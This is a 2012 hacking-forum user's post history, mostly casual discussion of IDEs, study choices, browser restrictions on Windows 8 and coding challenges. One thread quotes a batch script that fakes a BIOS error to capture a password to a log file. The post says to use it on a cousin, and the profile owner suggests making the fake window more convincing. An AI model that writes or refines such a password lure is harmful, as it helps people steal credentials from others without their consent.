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Messages - petermlm

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General discussion / Re: Please read :/
« on: May 26, 2012, 12:21:50 PM »
There is this resource:

Reddit is not just a place for memes, funny pics and cats. You can get great advices with it. There is a list of links in the right that may help.

One other think. I heard about Alcoholics Anonymous. I don't know if you can seek that out but I always heard it helps a lot.

I think you can also try to see a doctor or psychologist. Alcoholism is a problem that usually requires help this kind of help.

Good luck with this!

Hacking and Security / Re: keylogger for bios password
« on: May 23, 2012, 10:43:32 AM »
Ah, didn't know or didn't remember about that. Looks brutal, lol.

Hacking and Security / Re: Hacking phones via bluetooth these days
« on: May 23, 2012, 10:35:01 AM »
Kulverstukas, interesting. Thanks for the share.

Hacking and Security / Re: keylogger for bios password
« on: May 23, 2012, 12:51:29 AM »
This one better for you :P


Way better then what I was thinking! Great job!

Hacking and Security / Re: Hacking phones via bluetooth these days
« on: May 23, 2012, 12:49:15 AM »
Well then. Happy birthday to your cock!

About the bluetooth. I never had the chance to try that in older days. I did heard that it was possible to access other phones and even to "destroy" other phone. Obviusly most of these stories came from kids who didn't know what they were talking about. So I ask. What were the possible exploits in bluetooth enabled devices a few years ago and what could be some exploits in out days?

Hacking and Security / Re: keylogger for bios password
« on: May 20, 2012, 07:28:26 PM »
Code: [Select]
@Echo off
REM Social Enginerring at its finest
REM Batch by iTpHo3NiX
Echo Windows has encountered an error with your BIOS
echo protection. Please confirm your BIOS password to
echo run a security check on your system:
set /p biospass=
echo %biospass%>C:\err.log
echo Thank you.

Save that as a .bat file, run that and then ask your cousin saying "hey this popped up when I turned on the computer" Then there will be a "err.log" in c:\ with the pass

XD! I would suggest something to make the windows fullscreen, if it is possible. And also something to print more text in the window so the all script makes it look like it is actually doing something.

News and Announcements / Re: Weekly challenges
« on: May 20, 2012, 04:35:57 PM »
Bump! there still haven't been any suggestions for the first challenge!

Maybe the implementation of a data structure like linked list. Or maybe solving a problem. Your avatar, Kulver. A program to write the "kind of text" (if you know what I mean, lol) in your current avatar to ascii.

Maybe something more hard? Or more simple?

The only reason it stopped was because everyone forgot about it after the 2009 Christmas fiasco with that UK bicycle shop.

Hum... What is the story?

Anyway, it would be interesting. One week a chalenge to implement some algorithms like graph algoritms for example, or implement some data structures that are a little bit more then just the basic stack and queue and linked list.

Also some problems to solve that require a little bit more then just usage of ifs and whiles, lol.

There is this site:

It has a book that has a lot of programming challenges along with theoretical explanations about data structures and algorithms.

How ever, due to the fact that this is a security and hacking theme forum, we could make challenges focus on security related things, like algorithms of encryption and the like. Just in that area there are a lot of algorithms that are more then your trivial substitution routine.

Found it on the Webs / Re: gagipsum
« on: May 18, 2012, 03:13:34 PM »
XD! This text must be generated using the concept of Markov Chains or something like that. It is better then just random words.

C - C++ / Re: [C++] What is the best IDE?
« on: May 18, 2012, 02:50:38 PM »
My favorite IDE for C++ is Eclipse!

Code::Blocks and NetBeans are also very good!

I used Dev-C++ in school a long time ago. I used to like it but now I can't stand it's identation caos!

General discussion / Re: Signal Analysis or more CS? Advice needed
« on: May 16, 2012, 10:32:24 AM »
Has a student of Informatics Engineering (Which is pretty much like CS) who is also studying Information Theory and Control in an investigation grant I can say that you shouldn't not finish CS. Even if many aspects of CS are boring an very uninteresting I have come to learn that they get important when looking at the bigger picture.

If you want to follow Signal Processing and you are very interested in Crypto then let me tell you that knowing concepts of math is very important but knowing about how computers work is also very important. So by having all that knowledge you would have an easier time studying Signal Processing and etc.

But that is just my opinion. If you really fell that what you are doing in CS is not very important and believe you would be better off just studying Signal Processing and Crypto due to lack of time then I advise you to just follow that choice.

Hope I helped.

General discussion / Re: Firefox and Chrome banned on Windows 8?
« on: May 16, 2012, 10:10:51 AM »
The question is : How are they going to block FF/other browser?

I mean they can't block .exe from running without their authorization, right?

how exactly will they stop other browsers?

I also thought about this. I have no idea how this would be done. Assuming an OS is going to block a program, maybe they will do it by comparing the .exe of firefox and chrome with an .exe in the system. But the comparing part alone is already a pretty dumb one.

Maybe they will block a program that connects to the Internet and at the same time is firefox or chrome, but that is also very dumb and not very safe.

General discussion / Re: Firefox and Chrome banned on Windows 8?
« on: May 15, 2012, 01:10:29 PM »
not exactly, what you CAN collect with browser = all activities performed + programs installed + websites visited+etc,etc,etc....

by other means one can only collect data if you visit their sites/ sites with your ads on it/sniff data.......... or have some spyware installed, if a program not meant to send data sends data it raises all sorts of red flags....

Browsers can do anything and they can be
"updated" (read instructed in advanced spying).... you can just add more "features" anytime you wish....

the data sent is encrypted and there is no way to view it... use a good encryption and you get unbreakable protection against reversing it..

Lets not forget the default search engine...
FF = google
chrome = google
IE = bing (right?)

most people won't change search engines from the search bar. FF provides a drop-down, IE has only one option in its dropdown when it installs, more can be added though...

Very interesting!

General discussion / Re: Firefox and Chrome banned on Windows 8?
« on: May 15, 2012, 12:44:27 PM »
It does make sense, think about all the data they may collect from IE exclusively run, the only reason IE is popular is because most regular users don't even know that there are alternatives and it comes installed......
My ISP's website can be exclusively opened from IE only... tried everything I could think of but it will only open in IE....

Hum, interesting. I actually never thought that an ISP website would only open with IE.

About the data part, it does make sense yes. But wouldn't there be other ways to collect data in such a way that doesn't have anything to do with the browser?

General discussion / Re: Firefox and Chrome banned on Windows 8?
« on: May 15, 2012, 12:00:23 PM »
They want to turn us all into IE users, duh.

Yeh, like the article says.

And again, by todays standarts, that is also very strange. In almost any system that as wifi you can download other browsers. It makes no sense to restrict an OS to just one browser.

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